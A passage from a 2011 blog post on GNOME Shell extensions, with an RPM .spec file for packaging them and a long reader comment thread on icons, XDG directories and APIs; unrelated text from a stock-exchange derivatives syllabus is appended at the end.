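    if (current.indexOf(uuid) !== -1)
        return current;               // already disabled, nothing to do
    return current.concat([uuid]);    // full new list for "gsettings set"
}

var disabled = ['example@gnome-shell-extensions.gnome.org'];
disabled = addDisabled(disabled, 'helloworld@example.com');
console.log(disabled.join(', '));
// example@gnome-shell-extensions.gnome.org, helloworld@example.com
```

A GUI tool would do exactly this under the hood: read the current list, append or remove the UUID, and write the whole list back.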
Recently an official repository for GNOME Shell extensions was created by Giovanni Campagna. As of the date of this post it includes the following extensions:
Currently these extensions are not available as RPMs but I am sure that it will not take long before somebody does the necessary work to make this happen. If you want to build your own RPMs, here is a .spec file which packages the example shell extension. It assumes that the source files exist in gnome-shell-extensions.tar.gz in the build source directory. You can easily modify the file to use git archive --format=tar to pull the files directly from the extensions git repository and to build a package for other extensions.
Name: gnome-shell-extensions
Version: 2.91.6
Release: 1
License: GPLv2+
Group: User Interface/Desktops
Summary: A collection of extensions for the GNOME 3 Shell
Url:
Source: %{name}.tar.gz
BuildRequires: gnome-common
BuildRequires: pkgconfig(gnome-desktop-3.0)
Requires: gnome-shell
BuildRoot: %{_tmppath}/%{name}-%{version}-build
BuildArch: noarch
%description
GNOME Shell Extensions is a collection of extensions providing
additional optional functionality for the GNOME 3 Shell.
%prep
%setup -q -n %{name}
%build
# Needed because we build from a git checkout
[ -x autogen.sh ] && NOCONFIGURE=1 ./autogen.sh
%configure --enable-extensions="example"
make %{?_smp_mflags}
%install
rm -rf $RPM_BUILD_ROOT
%make_install
%find_lang %{name}
%clean
%{?buildroot:%__rm -rf %{buildroot}}
%postun
%files -f %{name}.lang
%defattr(-,root,root)
%doc README
%dir %{_datadir}/gnome-shell
%{_datadir}/gnome-shell/extensions/
%{_datadir}/glib-2.0/schemas/
%changelog
* Tue Mar 29 2011 - 2.91.6-1
- Initial build
I am going to assume that you know how to build RPMs. Since the GNOME Shell and, by extension (bad pun?), extensions are still a moving target at present, you will probably have to make minor changes to the above .spec file to meet your specific requirements and to conform to changes in the extensions repository. A word of caution however – if you build and install all the shell extensions that are in the repository at the one time, you will most certainly break GNOME Shell.
What are my thoughts on an architecture and framework for extensions? Based on my experience with developing extensions for Mozilla Firefox, WordPress and suchlike, I believe that:
The GNOME Shell is still under active development. It will probably be GNOME 3.2 before it stabilizes to the extent that serious effort will be expended developing an extensions ecosystem. A lot more documentation, tools and infrastructure need to be place before a formal reliable ecosystem for GNOME Shell extensions emerges.
As always, experiment and enjoy the experience!
P.S. If you have found this post via an Internet search, you might be interested to know that I have written a number of other posts in this blog about configuring and extending the GNOME 3 Shell. Most of the extensions that I have written are available here.
Another masterfully done blog post on something that not many people understand or know about. Excellent!
Great post. I learned a lot!
thank you for paving the way for us. keep these posts coming!
Thanks alot!
Nice! I will find some time to translate this.
tyvm for that post – just excellent :).
Wow ! Excellent post!
Pretty easy and practical.
Nice work, I’m trying to modify your 6th example to have an icon for Arch Linux but I think I might be missing something. The 8th line where icon_name: is specified…I’m trying to put a filename there that is included in my extension folder. I assumed that was how to do it but I’ve tried with a .png and a .jpeg file, neither of which work. What should I be doing instead?
excellent post a good place to start with gnome3 customization :-)
Lol, I have the same python code in gnome-tweak-tool for listing installed extensions!
I didn’t post about it because the thought of advertising the fact that one can execute arbitrary javascript over DBus made me nervous…
“By the way I really wish the GNOME developers would stop creating more and more hidden subdirectories in a users home directory! It would be really nice if everything to do with GNOME 3 was located under, say, .gnome3.”
Ironically back in the old days there was a .gnome and then a .gnome2, and a .gtk and a .gtk-2.0, and a .abiword and a .evolution… and so on and so on. These all mush up configuration with data with caches, and is a right mess.
.local/ contains directories for user data
.config/ contains directories for user configuration
.cache/ contains directories for user cache
Now you know what to backup, what is configuration data, and what can be deleted on a whim. One glorious day we won’t have a multitude of .directories but just a few, and then clear and obvious naming under those.
[…] enough, after some trial and error with GNOME Shell extensions, I could at least make some of my daily-use applications show their notification status icon on […]
[…] struggled with JavaScript and finally managed to write a GNOME Shell extension that lets my frequently used applications sit in the top bar at the very top of the screen […]
Thanks for your posts and insights into GNOME shell.
Fedora has the extensions packaged and available in their (Fedora 15) repositories. dconf-editor seems to work fine; earlier it wasn’t crashing but it wasn’t allowing changes to text entries either, but with the latest updates it is.
Very Good Article!!!
[…] code repository. I two articles: one about those extra extensions available at the GNOME GIT and another article with nice code examples and explanations. Adding to this while browsing the web for some kind of gnome-shell integration with pidgin I found […]
I’m having the same issue as Zach (see above, April 14, 2011 at 2:32 am), trying to replace the Activities string with the Ubuntu logo. I’ve tried logos in the extension folder in SVG, PNG, and JPEG formats, and have included and excluded the filetype extension during attempts, without success. Has anyone found a solution yet?
~/.local is not just yet another hidden directory: it’s standardized, and part of an effort precisely to reduce the proliferation of hidden directories in users’ home directories; maybe modify that paragraph?
See
Reuben,
I agree that .local is part of the XDG Base Directory Specification. I used the term “hidden directory” because most casual Linux users understand that a period as first character in a directory or filename “hides” the directory or filename. A quick Internet search on “Linux hidden directory” indicates that this is a common term for such directories.
Possibly I was unclear: I didn’t mean to criticise your use of the term “hidden directory”, which was perfectly correct, just to point out that .local was not yet another such, but in fact precisely the opposite (as you’ve now acknowledged in the article, great!).
By the way, have you submitted your patch to looking-glass to display loaded extensions upstream? It seems like it would be the sort of thing many looking-glass users would like.
In fact, you don’t seem to have changed the article. It’s this paragraph that I thought was unfair:
The GNOME developers are simply not creating more and more hidden subdirectories. Instead, they are using XDG standard locations such as ~/.local and ~/.config. Some GNOME applications do still use individual directories, but these are not official parts of GNOME.
Another mistake is to suggest that it would be good if everything to do with GNOME 3 were located under .gnome3. This is not true, and the XDG standards reflect rather better ideas. For example, things that installed from a distribution go under /usr and installed on a per-system basis go in /usr/local go in ~/.local when installed on a per-user basis, whereas ~/.config is reserved for configuration (things that would go under /etc). Then the per-user layout mirrors the system layout and the whole organisation is more consistent.
You are correct in what you are saying of course. I was just grumbling about all the “hidden” directories that now exist in a users home directory. I know they are all necessary in some fashion or another but I started using Unix when the only file created by default in a new users home directory was .profile! The genie is out of the bottle and cannot be put back in without a lot of pain.
Yes, I know that the XDG Base Directory Specification specifies some of these directories. But, putting on my SDO (Standards Development Organization) hat, the specification actually permits putting everything specified by the specification under .gnome3 as I suggested. For example $XDG_DATA_HOME could be specified to be $HOME/.gnome3, etc. Instead GNOME choose to not specify $XDG_DATA_HOME and, as a result, we end up with $HOME/.local etc.
Let us choose to acknowledge and respect the difference in opinions and move on. I will rework or delete that paragraph when I get a chance.
– Finn
Zach,
Figured it out. Although it’d be nice for extensions to be wholly independent and contain all of the requisite parts, at this point with Gnome Shell icons and other images have to be registered with the theme you’re using. While I’m sure others much better than I could fix this, I can at least share what I did to make this work:
1) Save the image you want to use in your Gnome Shell Extension folder, located at ~/.local/share/gnome-shell/extensions/[uuid]/. I used an .svg.
2) Create a symbolic link to the logo, from the Gnome Shell Extension folder to the default Gnome theme folder:
sudo cp -s ~/.local/share/gnome-shell/extensions/[uuid]/[image file] /usr/share/icons/gnome/scalable/places
3) Update icon-theme.cache so the system is aware of the icon addition:
sudo gtk-update-icon-cache /usr/share/icons/gnome
4) Replace line 8 of extension.js with link to icon (in brackets):
let logo = new St.Icon({ icon_type: St.IconType.FULLCOLOR, icon_size: hotCornerButton.height, icon_name: '[icon name, without file extension]' });
5) Restart Gnome Shell by pressing Alt-F2 to bring up the Command window; type ‘r’ and press Enter.
Good work, Kitheme!
Kitheme, Zach, there is a simpler way to do it. See. Let me know if you run into any problems.
“For example $XDG_DATA_HOME could be specified to be $HOME/.gnome3”
Wait, that would be totally wrong. Other applications are also using XDG_DATA_HOME. Renaming .local to .gnome3 is completely misleading and totally miss the point of the XDG specs.
I explained that here:
My point was that the specification says I can do it. If applications are correctly written they should handle the changed $XDG_DATA_HOME if I set up the appropriate directories. If applications have hard-coded directories then, of course, all bets are off.
Hi,
thanks for your article. With the information from your article I started to develop my first extension. But it’s really hard to find any further documentation if you are looking for special things. I need to know how to run a command from an extension and cannot find anything. I found how to start a registered app, but I need to run a simple command.
Do you have any example code or hints to start a command out of an extension??
The extension I want to create will give you the ability to change the CPU speed on laptops – in GnomeShell there is no possibility to do that. The “old” Frequency applet is not compatible with the Shell :-(
Thx,
Ronny
Hi:
I think this is a great post. Do you know how to find out which hooks/APIs are available for hacking into gnome-shell 3.0.1?
I’ve been trying to build an extension and it is really a pain because I have to go guessing around.
APIs are not documented and are not frozen. You have to look at the source code.
In a future blog, I will document some of the APIs that I know about.
Thank you very much for the great tutorial. Now I can move further from designing just themes. I have one question though. Suppose I want to display the text on the desktop, below the windows, what should I do? I’ve tried putting z-index:0 in the stylesheet but it doesn’t work. Maybe it requires some javascript magic to do that.
Thank u in advance.. :)
Hi fpmurphy,
Thank you very much for your great useful article. And looking forward to the post about APIs.
I want to remove a popup menu from Main.Panel._leftBox, but I don’t know if there is API called `remove` or something like that.
I’m using a scalable SVG icon and I think it looks a bit small. Is there any way to change the icon size depending on the panel height? I remember that gnome-panel used to do this. It used the png icon specified in places/24/start-here.png for example when the panel was set to a small size. It then moved on to 32, 48, 64 etc if the panel was extremely huge. :P (Using the scalable icon in between if I remember right.)
How do I use international characters in a string? In the popup it shows @#$@#$ instead of ą,ę,ż,ź.
@Matlas. Strings should be in UTF8 format in an appropriate compiled message catalog, and LC_ALL or LANG should be set to the required locale.
See the helloworld1.tar.gz extension at for an example of a simple extension with message catalog
support.
Hi Finnbarr, really nice article!
I figured out that your python script only works with python 2.x. So maybe you’ll drop a note here. On arch linux I’m using ‘#!/usr/bin/python2’ as shebang.
Ruben, Good catch. I have not tried it on Python 3
Greetings. Just installed your righthotcorner Gnome 3 extension. Works fine. Being left-handed I’d really like to disable the hotspot in the upper left corner; any suggestions would be appreciated.
Regards,
Steve Arroyo
Steve,
Let me look at it and get back to you. I am sure I can come up with something.
@Steve,
OK, I have produced an extension which should meet your needs.
See
Hi
Please could you do a network traffic monitor. I tried out the gnome-shell-system-monitor-applet but it had a memory leak issue.
Regards
Rayaz
Good idea. If I get time I will do something.
Hello!
Thank you for the tutorial, it’s a good starting point!
But I noticed that the example no. 3 would not run if the gnome-shell-extensions-alternative-status-menu is installed (or it may be run, but the ‘Hello’ menu item is suppressed by alternative-status-menu, I think, because when I modified the code of gnome-shell-extensions-alternative-status-menu, it would add the ‘Hello’ menu item). Without gnome-shell-extensions-alternative-status-menu, the example adds ‘Hello’ menu item, but would not execute _showHello function (or at least I couldn’t make it execute). Localization is OK, I could run the example no. 2.
So, why does gnome-shell-extensions-alternative-status-menu interfere with/suppress my extension? Any ideas, please?
Hard to say without looking at your code and knowing exactly what version of the GNOME shell you are using and what other extensions are installed. The GNOME Shell and extensions are still a moving target so all sorts of things can go wrong.
I’m trying to get a couple of your extensions working in Ubuntu 11.10 Beta 1 (gnome-shell 3.1.4). Changing metadata version to 3.1.4 allowed moveclock to work, but when I do the same for applicationsbutton-1.1 and change icon_name to ‘distributor-logo’ it doesn’t work. Any ideas? Thanks!
No idea unfortunately. I have not tried GNOME Shell on Ubuntu 11.10. You need to search though the installed icons (probably /usr/share/icons) and pick a suitable icon.
Thank you for information.
very useful information, thanks
const Panel = imports.ui.panel;
function main() {
Panel.STANDARD_TRAY_ICON_SHELL_IMPLEMENTATION['a11y'] = '';
}
had error: missing “init” function
Gnome-shell 3.2.1
This post does NOT cover GNOME Shell 3.2!
Wonderful article! Thanks :)
I hadn’t imagined that creating a shell extension would be that easy. Really very helpful article. I have just created a welcome screen extension. Thank you so much, will try to do something big.
It’s powerful documentation, please keep it updated.
Great info! Thanks a lot for sharing it.
Does anybody know how I can move the message tray to the right side of the screen? I want it to be vertical. If there is a way, I may write an extension. Thanks.
Do you want to move the message tray from the bottom of the screen to the right side of the screen, is that what you are saying?
Yes, that is what I want to do. When I move the mouse to the right side of the screen, the message tray must show, and it must show vertically. I don’t want you to do it for me, but just to give me a hint how this can be done, if it is possible. Thanks again.
I’d really like to know, where the source code for the gi-imports is located. E.g. at lines like “const Shell = imports.gi.Shell;”, where does “gi.Shell” sit?
I have downloaded Gnome’s sources with jhbuild, but can’t find the appropriate places.
See
Enter your email address | http://blog.fpmurphy.com/2011/04/gnome-3-shell-extensions.html | CC-MAIN-2022-05 | refinedweb | 6,455 | 51.55 |
Dependency Injection: New Ground or Solid Footing?
Andrew McVeigh has written a detailed history of dependency injection, summarized here. McVeigh is an academic who is working on architecture description languages (ADLs) as part of his Ph.D. He has also worked with Rod Johnson on a commercial product.
McVeigh provides this definition of a software component:
A component is a unit of software that can be instantiated, and is insulated from its environment by explicitly indicating which services (via interfaces) are provided and required.

McVeigh compares software components with electronic components since both should be "interchangeable, tangible units which are clear about which services they provide and which services they require." As you wire up your receiver, speakers, DVD, and your new 96" HDTV, the shape of the input and output connectors explicitly informs you which services each component requires and provides, respectively.
A Java or .Net class is not a component per se. A class can describe what it provides by means of its interfaces, but it does not declare exactly what it depends on to run. It is true that method types declare what a specific method requires, but nothing declares what is required by the class as a whole. Spring and other DI containers fill this gap by allowing class annotations or external configuration files to explicitly declare what a class requires. Configuration together with a Java class creates a software component that almost meets McVeigh's definition. Spring Beans fall just short of McVeigh's definition of a component because for Spring the connectors are implicit - you can only set the bean property and Spring simply calls the setter.
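To illustrate the gap in plain code, here is a hypothetical sketch (not Spring itself, and the class and service names are invented): the first class hides its requirement inside the constructor, while the second declares it explicitly so a tiny container can wire it from configuration.

```javascript
// A plain class: its dependency on a mailer is buried in the constructor body,
// so nothing outside the class can discover or substitute it.
class ImplicitGreeter {
  constructor() {
    this.mailer = { send: (msg) => console.log('sending', msg) } // hidden requirement
  }
}

// A "component": requirements are declared explicitly, so a tiny container
// (standing in for a DI framework) can satisfy them from configuration.
class Greeter {
  static requires = ['mailer'] // explicit "required services" declaration

  constructor(deps) {
    this.mailer = deps.mailer
  }

  greet(name) {
    this.mailer.send(`Hello, ${name}`)
    return `Hello, ${name}`
  }
}

// Minimal container: reads the declared requirements and injects them by name.
function wire(ComponentClass, registry) {
  const deps = {}
  for (const name of ComponentClass.requires || []) {
    deps[name] = registry[name] // look up each required service
  }
  return new ComponentClass(deps)
}

const sent = []
const registry = { mailer: { send: (msg) => sent.push(msg) } }
const greeter = wire(Greeter, registry)
greeter.greet('Ada') // uses the injected mailer
```

The point of the sketch is only that the `requires` declaration makes the class's environment explicit, which is the property McVeigh attributes to components.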
A major feature of ADLs is the fact that the connectors are explicit. It's not just a loose wire, but a cable with an HDMI connector on the end. The explicit nature of the connectors provides ADLs with interesting architectural features, including improved testability and improved architectural tooling. In certain ADLs the connectors can be more functional. They can act like components in their own right, by performing extra functions like filtering or error handling.
Another major differentiator between ADLs and current DI technology is the notion of a Composite Component. Once you've wired all your electronics together, you have a Home Entertainment System. Yet, it isn't like Frosty the Snowman. There is no additional entity that magically appears once everything is put together just so. Your Home Entertainment System is nothing but the components and the wires that connect them.
Using McVeigh's ADL language called Backbone, you can create a new Composite Component by wiring up existing components. You can't perform this trick with Spring today since every Spring bean must be associated with a class. Despite its power, Backbone is much easier to read than Spring XML configurations.
McVeigh narrates an interesting history of ADLs. The first ADL was Conic, written in Pascal and used in distributed computing in the 1980s. Another ADL, Darwin, influenced COM. The UML specification contains an ADL that was influenced by Rational Realtime and the ROOM methodology.
Some of the future directions of dependency injection that McVeigh details include:
- The ability to swap out components at runtime.
- Evolving systems over time by capturing the change sets in ADL.
- Fractal-like composition - being able to drill into a layered system and see composite components at every level.
- GUIs - a natural fit for composite development
- Architectural design and analysis tools.
McVeigh shows us that not only is Dependency Injection here to stay, but it has a long history and an interesting future.
*Note: edited Feb 1st in response to reader comments
andrew mcveigh
Just a few minor points. My component language is Backbone, rather than Backbase. Also, the UML was influenced by ROOM and Rational Realtime rather than the other way around.
In this first article, I wasn't able to describe the key Backbone features, as I felt I needed to cover the similarities between ADLs and DI. I'll write up Backbone per se in the second article. The key point of Backbone is that it allows wiring changes for component reuse. Explicit connectors are a bit of a must for this type of facility.
Rod (Johnson) also pointed out that the new namespace features in Spring2.5 should allow me to build the composite features directly into Spring. I plan to try this out, as it sounds quite interesting.
Cheers (and thanks),
Andrew McVeigh
Cheers,
Andrew McVeigh
Re: good summary
by
Jep Castelein
Over the years we've been confused with:
-'backspace'
-'backpack', the ajax-based project manager
-'jackbase', combination of Jackbe and Backbase
And more...
Jep
Re: good summary
by
Michael Bushe
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
Michael
Re: good summary
by
andrew mcveigh
Whoops! Yes, I do a lot of work with RIAs so I mentally slipped in Backbase for Backbone. My apologies.
No worries! Backbone isn't a great name at any rate. Since the language is so close in syntax to Darwin, the neat-o name for it would be Huxley (Darwin's bulldog) which is also the name of building of the comp sci department of Imperial... I just can't be bothered to change it ;-)
Following up on your notion of convergent evolution -- when I designed Backbone, I had never seen Darwin. Bizarrely, the syntax turned out to be very, very similar and many of the concepts are identical even though Darwin is perhaps 8 years older. The same needs lead to similar solutions, I guess. In retrospect I probably took my terminology from UML which was influenced by the ADLs.
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
I wasn't planning this (although it's an interesting idea and closely linked to the discussion on XML versus language grammars). Backbone is more of a proof of concept (and interestingly the runtime for my case modelling tool). I think that writing Backbone/Spring at the level of text isn't great -- I see the text form as an means to an end. What i meant is that i would use the Spring namespace features to add simple connectors to spring. I may also add a simple form of composites. I will be doing this as part of a case study for inclusion into my phd.
Instead of using text to create these types of configurations, I use a UML2 case tool I have spent the last 3 years on. It can model these architectures in a very pleasant and intuitive way. It's called jUMbLe and all the pictures in my article are from it. It has sophisticated features for the rewiring and checking abilities I allude to in my article, which allow reuse and evolution of a component system to be modelled (the core of my phd). The plan is to generate Spring output (as well as other ADLs) from the models (hence the need to add extra expressiveness to the Spring config). At the moment, I just generate Backbone which is not as "production capable" as Spring (also less feature rich in many other areas -- e.g. no aspects).
Interestingly, my phd started with the idea of using Backbone as the plugin architecture for my case tool. My goal (soon to be reached) is that jUMbLe is able to manipulate its own component architecture! The aim is to form a very extensible componentised case tool... The working title for my thesis is "An Architectural Approach for Extensible Applications" or something like that ;-)
Here's a picture of a dummy architecture i'm modeling as an example:...
This shows the evolution of a "Stereo" component -- I have replaced a component instance with the "EnhancedMixer" component instance. This is one type of rewiring where i have disconnected the old mixer and wired in a new one as a delta change.
Another feature worth quickly mentioning is that this example shows type inferencing on the ports of Stereo. The interface types have been inferred from the internal connections of the component.
Cheers,
Andrew
Article Fixed
by
Michael Bushe
I look forward to seeing your project develop, it looks like a great tool, and especially cool if it can output Spring config.
Michael
Re: good summary
by
andrew mcveigh
Cheers,
Andrew
Last point worth re-reading...
by
Jim Leonardo
Wow... I suspect McVeigh's got an industry background? True?
Re: Last point worth re-reading...
by
andrew mcveigh
"Finally, McVeigh laments the disconnect between academic and industry in software development."
Wow... I suspect McVeigh's got an industry background? true?
Yes, I've spent the last 18 yrs working on commercial s/w systems, although i also spent time as a speech researcher in my misspent youth (he laments on the day before his 40th birthday ;-).
True about many of the computer science formalisms, although I think there has to be give and take on both sides which happens (albeit slowly). E.g. BNF (and lots of parsing theory) is based on Chomsky grammars, a good example of how something that is once considered to be of mainly academic interest has now been accepted as a standard s/w engineering technique.
My belief is that both academia and industry need to find a healthy middle ground. Too often getting a paper published in an academic journal is about putting sophisticated spin on fairly simple ideas so that it will get published (the reviewers are often incredibly mean). Academia needs to strive for simplicity of explanation. On the other side, too often industry accepts substandard s/w simply because the market doesn't expect better, either ignoring or dismissing academic results that could be applied. It's really not good enough.
At the core of s/w engineering research is completely mind-blowing stuff, which unfortunately needs to be understood to be applied: things like turing machines and complexity modeling, the pi calculus (for mobile systems), CSP for modeling concurrency and checking for deadlock etc, model checking (got 2007's turing award) for checking systems. i think (hope) that as this type of stuff becomes more accepted by s/w engineers, they will eventually be as commonplace as BNF is now.
I remain optimistic: things like automata behind regular expressions are considered old hat now, but they are also the basis of much of the theory of computer science. I sincerely hope that in time, developers will be to computing as surgeons are to medicine -- i.e. the theory and practice meet up in the same group of people.
Cheers,
Andrew
p.s. I agree with you about much of the academic papers on computer languages, though. I really struggle with these. I think they tend to be a bit ridiculous... | https://www.infoq.com/news/2008/01/dependency-injection | CC-MAIN-2017-09 | refinedweb | 1,854 | 62.48 |
Vuex is the solution for state management in Vue applications. The next version is Vuex 4. However, even as Vuex 4 is just getting out the door, Kia King Ishii (a Vue core team member) is talking about his plans for Vuex 5, and I’m so excited by what I saw that I had to share it with you all. Note that Vuex 5 plans are not finalized, so some things may change before Vuex 5 is released, but if it ends up mostly similar to what you see in this article, it should be a big improvement to the developer experience.
With the advent of Vue 3 and its composition API, people have been looking into hand-built simple alternatives. For example, Gábor demonstrates a relatively simple, yet flexible and robust pattern for using the composition API along with provide/inject to create shared state stores. As Gábor states in his article, though, this (and other alternatives) should only be used in smaller applications because they lack all those things that aren’t directly about the code: community support, documentation, conventions, good Nuxt integrations, and developer tools.
That last one has always been one of the biggest issues for me. The Vue devtools browser extension has always been an amazing tool for debugging and developing Vue apps, and losing the Vuex inspector with “time travel” would be a pretty big loss for debugging any non-trivial applications.
Thankfully, with Vuex 5 we’ll be able to have our cake and eat it too. It will work more like these composition API alternatives but keep all the benefits of using an official state management library. Now let’s take a look at what will be changing.
Defining A Store

In current versions of Vuex, actions cannot mutate the state on their own; they must use a mutator. So what does Vuex 5 look like?
import { defineStore } from 'vuex'

export const counterStore = defineStore({
  name: 'counter',

  state () {
    return { count: 0 }
  },

  getters: {
    double () {
      return this.count * 2
    }
  },

  actions: {
    increment () {
      this.count++
    }
  }
})
There are a few changes to note. First, the store now requires a name; this name is used by the Vuex registry, which we’ll talk about later. Second, mutations are gone: Kia noted that too often, mutations just became simple setters, making them pointlessly verbose, so they were removed. He didn’t mention whether it was “ok” to mutate the state directly from outside the store, but we are definitely allowed and encouraged to mutate state directly from an action, and the Flux pattern frowns on the direct mutation of state.
Note: For those who prefer the composition API over the options API for creating components, you’ll be happy to learn there is also a way to create stores in a similar fashion to using the composition API.
import { ref, computed } from 'vue'
import { defineStore } from 'vuex'

export const counterStore = defineStore('counter', () => {
  const count = ref(0)
  const double = computed(() => count.value * 2)

  function increment () {
    count.value++
  }

  return { count, double, increment }
})
As shown above, the name gets passed in as the first argument for defineStore. The rest looks just like a composition function for components. This will yield exactly the same result as the previous example that used the options API.
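To build intuition for how such a flat store object could be produced from the options shape, here is a hand-rolled sketch of a defineStore-like factory. This is purely illustrative — an assumption about the mechanics, not the real Vuex 5 implementation — and it omits reactivity entirely:

```javascript
// Illustrative stand-in for defineStore: turns { name, state, getters, actions }
// into a single flat object where getters behave like computed properties.
function defineStoreSketch(options) {
  const store = { ...options.state() } // seed with the initial state

  // Getters become property accessors so `store.double` reads like plain state.
  for (const [key, getter] of Object.entries(options.getters || {})) {
    Object.defineProperty(store, key, { get: () => getter.call(store) })
  }

  // Actions are bound so `this` refers to the store and can mutate state.
  for (const [key, action] of Object.entries(options.actions || {})) {
    store[key] = action.bind(store)
  }

  return store
}

const counter = defineStoreSketch({
  name: 'counter',
  state () { return { count: 0 } },
  getters: { double () { return this.count * 2 } },
  actions: { increment () { this.count++ } }
})

counter.increment()
console.log(counter.count, counter.double) // → 1 2
```

The sketch shows why the flat API can work: state, getters, and actions all end up as ordinary properties of one object.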
Getting The Store Instantiated
There are pros and cons to importing the store directly into the component and instantiating it there. It allows you to code split and lazily load the store only where it’s needed, but now it’s a direct dependency instead of being injected by a parent (not to mention you need to import it every time you want to use it). If you want to use dependency injection to provide it throughout the app, especially if you know it’ll be used at the root of the app where code splitting won’t help, then you can just use provide:
import { createApp } from 'vue'
import { createVuex } from 'vuex'
import App from './App.vue'
import store from './store'

const app = createApp(App)
const vuex = createVuex()
app.use(vuex)
app.provide('store', store) // provide the store to all components
app.mount('#app')
And you can just inject it in any component where you’re going to use it:
import { defineComponent } from 'vue'

export default defineComponent({
  name: 'App',
  inject: ['store']
})

// Or with Composition API
import { defineComponent, inject } from 'vue'

export default defineComponent({
  setup () {
    const store = inject('store')
    return { store }
  }
})
I’m not excited about this extra verbosity, but it is more explicit and more flexible, which I am a fan of. This type of code is generally written once right away at the beginning of the project and then it doesn’t bother you again, though now you’ll either need to provide each new store or import it every time you wish to use it, but importing or injecting code modules is how we generally have to work with anything else, so it’s just making Vuex work more along the lines of how people already tend to work.
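Conceptually, provide/inject amounts to a lookup in a registry that the app root populates. A minimal stand-alone sketch of that idea (not Vue’s actual implementation; the names here are invented) looks like this:

```javascript
// Minimal stand-in for app-level provide/inject: the "app" holds a registry
// that any component created under it can read from.
function createAppSketch() {
  const provided = new Map()
  return {
    provide (key, value) { provided.set(key, value) },
    // A component's setup() receives an inject() bound to this app's registry.
    run (setup) { return setup((key) => provided.get(key)) }
  }
}

const app = createAppSketch()
app.provide('store', { count: 42 })

// "Component" that injects the store instead of importing it directly.
const vm = app.run((inject) => {
  const store = inject('store')
  return { store }
})

console.log(vm.store.count) // → 42
```

The benefit mirrored here is the same as in the real API: the component names what it needs, and the root decides which concrete instance satisfies it.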
Using A Store
Apart from being a fan of the flexibility and the new way of defining stores the same way as a component using the composition API, there’s one more thing that makes me more excited than everything else: how stores are used. The old API only gets more difficult to use when you are using namespaced modules. By comparison, Vuex 5 looks to work exactly how you would normally hope:
store.count         // Access State
store.double        // Access Getters (transparent)
store.increment()   // Run Actions

// No Mutators
Everything — the state, getters and actions — is available directly at the root of the store, making it simple to use with a lot less verbosity, and it practically removes all need for using mapState, mapGetters, mapActions and mapMutations for the options API or for writing statements or simple functions for the composition API. This simply makes a Vuex store look and act just like a normal store that you would build yourself, but it gets all the benefits of plugins, debugging tools, official documentation, etc.
Composing Stores
The final aspect of Vuex 5 we’ll look at today is composability. Vuex 5 doesn’t have namespaced modules that are all accessible from the single store. Each of those modules would be split into a completely separate store. That’s simple enough to deal with for components: they just import whichever stores they need and fire them up and use them. But what if one store wants to interact with another store? In Vuex 5, it registers that store via the use option:

// store/counter.js
import { defineStore } from 'vuex'
import greeterStore from './greeter' // Import the store you want to interact with

export default defineStore({
  name: 'counter',

  use () {
    return { greeter: greeterStore }
  },

  state () {
    return { count: 0 }
  },

  getters: {
    greetingCount () {
      return `${this.greeter.greeting} ${this.count}` // access it from this.greeter
    }
  }
})
With v5, we import the store we wish to use, then register it with use, and now it’s accessible all over the store at whatever property name you gave it. Things are even simpler if you’re using the composition API variation of the store definition:
// store/counter.js
import { ref, computed } from 'vue'
import { defineStore } from 'vuex'
import greeterStore from './greeter' // Import the store you want to interact with

export default defineStore('counter', ({ use }) => { // `use` is passed in to the function
  const greeter = use(greeterStore) // use `use` and now you have full access
  const count = ref(0)
  const greetingCount = computed(() => {
    return `${greeter.greeting} ${count.value}` // access it like any other variable
  })

  return { count, greetingCount }
})
No more namespaced modules. Each store is separate and is used separately. You can use use to make a store available inside another store to compose them. In both examples, use is basically just the same mechanism as vuex.store from earlier, and they ensure that we are instantiating the stores with the correct instance of Vuex.
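One way to picture the registry behavior described here: use resolves a store definition through a per-instance registry, so every store asking for the same definition gets one shared instance. The following is a hand-rolled sketch of that assumed mechanism — illustrative only, not actual Vuex 5 code:

```javascript
// Each "Vuex instance" keeps a registry keyed by store name, so use()
// returns the same instance no matter how many stores ask for it.
function createVuexSketch() {
  const registry = new Map()

  function use (definition) {
    if (!registry.has(definition.name)) {
      // Pass `use` down so stores can compose further stores.
      registry.set(definition.name, definition.setup({ use }))
    }
    return registry.get(definition.name)
  }

  return { store: use }
}

const greeterStore = {
  name: 'greeter',
  setup: () => ({ greeting: 'Hello' })
}

const counterStore = {
  name: 'counter',
  setup: ({ use }) => {
    const greeter = use(greeterStore) // compose: pull in the shared greeter store
    let count = 1
    return { greetingCount: () => `${greeter.greeting} ${count}` }
  }
}

const vuex = createVuexSketch()
const counter = vuex.store(counterStore)
console.log(counter.greetingCount()) // → Hello 1
// Asking for the greeter again yields the same shared instance:
console.log(vuex.store(greeterStore) === vuex.store(greeterStore)) // → true
```

Keeping the registry inside the Vuex instance (rather than module scope) is what would let each app, or each test, get its own isolated set of stores.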
TypeScript Support
For TypeScript users, one of the greatest aspects of Vuex 5 is that the simplification makes it easier to add types to everything. The layers of abstraction in older versions of Vuex made proper typing nearly impossible. Vuex 4 increases our ability to use types, but there is still too much manual work involved to get a decent amount of type support, whereas in v5 you can put your types inline, just as you would hope and expect.
Conclusion
Vuex 5 looks to be almost exactly what I — and likely many others — hoped it would be, and I feel it can’t come soon enough. It simplifies most of Vuex, removing some of the mental overhead involved, and only gets more complicated or verbose where it adds flexibility. Leave comments below about what you think of these changes and what changes you might make instead or in addition. Or go straight to the source and add an RFC (Request for Comments) to the list to see what the core team thinks. | https://kerbco.com/whats-coming-to-vuex/ | CC-MAIN-2022-05 | refinedweb | 1,429 | 57.81 |
Copyright © 2011 by National Stock Exchange of India Ltd. (NSE)
Exchange Plaza, Bandra Kurla Complex, Bandra (East), Mumbai 400 051 INDIA

All content included in this book, such as text, graphics, logos, images, data compilation etc. are the property of NSE. This book or any part thereof should not be copied, reproduced, duplicated, sold, resold or exploited for any commercial purposes. Furthermore, the book in its entirety or any part cannot be stored in a retrieval system or transmitted in any form or by any means, electronic, mechanical, photocopying, recording or otherwise.

Distribution of weights of the Derivatives Market (Dealers) Module Curriculum

Chapter No  Title                                            Weights (%)
1           Introduction to Derivatives                      5
2           Understanding Interest Rates and Stock Indices   5
3           Futures Contracts, Mechanism and Pricing         5
4           Application of Futures Contracts                 10
5           Options Contracts, Mechanism and Applications    10
6           Pricing of Options Contracts and Greek Letters   10
7           Trading of Derivatives Contracts                 20
8           Clearing and Settlement                          20
9           Regulatory Framework                             10
10          Accounting for Derivatives                       5

